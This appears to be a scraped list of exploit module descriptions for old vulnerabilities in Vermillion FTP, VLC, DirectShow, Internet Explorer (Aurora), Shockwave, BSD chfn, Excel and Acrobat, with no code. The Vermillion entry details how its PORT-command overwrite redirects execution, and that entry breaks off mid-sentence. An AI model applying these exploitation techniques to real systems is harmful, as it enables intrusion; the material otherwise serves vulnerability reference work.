This module exploits an out-of-bounds array access in the Arcane Software Vermillion FTP server. By sending an specially crafted FTP PORT command, an attacker can corrupt stack memory and execute arbitrary code. This particular issue is caused by processing data bound by attacker controlled input while writing into a 4 byte stack buffer. Unfortunately, the writing that occurs is not a simple byte copy. Processing is done using a source ptr (p) and a destination pointer (q). The vulnerable function walks the input string and continues while the source byte is non-null. If a comma is encountered, the function increments the the destination pointer. If an ascii digit [0-9] is encountered, the following occurs: *q = (*q * 10) + (*p - '0'); All other input characters are ignored in this loop. As a consequence, an attacker must craft input such that modifications to the current values on the stack result in usable values. In this exploit, the low two bytes of the return address are adjusted to point at the location of a 'call edi' instruction within the binary. This was chosen since 'edi' points at the source buffer when the function returns. NOTE: This server can be installed as a service using 'vftpd.exe install'. If so, the service does not restart automatically, giving an attacker only
This module exploits an input validation error in VideoLAN VLC < 1.1.7. By creating a malicious MKV or WebM file, a remote attacker could execute arbitrary code. NOTE: As of July 1st, 2010, VLC now calls SetProcessDEPPoly to permanently enable NX support on machines that support it.
This module exploits a memory corruption within the MSVidCtl component of Microsoft DirectShow (BDATuner.MPEG2TuneRequest). By loading a specially crafted GIF file, an attacker can overrun a buffer and execute arbitrary code. ClassID is now configurable via an advanced option (otherwise randomized) - I)ruid
This module exploits a memory corruption flaw in Internet Explorer. This flaw was found in the wild and was a key component of the 'Operation Aurora' attacks that lead to the compromise of a number of high profile companies. The exploit code is a direct port of the public sample published to the Wepawet malware analysis site. The technique used by this module is currently identical to the public sample, as such, only Internet Explorer 6 can be reliably exploited.
This module exploits a weakness in the Adobe Shockwave player's handling of Director movies (.DIR). A memory corruption vulnerability occurs through an undocumented rcsL chunk.
chfn, chpass and chsh dos not properly parse authname switch ("-u"), which causes the applications to crash when parsing a long string. Those binaries are setuid root by default.
The Adobe Shockwave Director is vulnerable to a memory corruption vulnerability in the tSAC Chunk. An attacker can exploit this vulnerability to execute arbitrary code on the target system. The impact of this vulnerability is considered to be medium to high.
This exploit targets a memory corruption vulnerability in Microsoft Excel's HFPicture Record parsing. It allows an attacker to corrupt memory and potentially execute arbitrary code.
This exploit is for Adobe Acrobat and Reader. It takes advantage of a memory corruption vulnerability in the software. The specific vulnerability is related to the "pushstring" function. This exploit allows an attacker to execute arbitrary code on a target system. The impact of this vulnerability is considered to be medium to high.
The exploit takes advantage of a memory corruption vulnerability in Excel 2002 sp3. It uses a combination of pop pop ret and call esp instructions to execute shellcode.
Services By CQR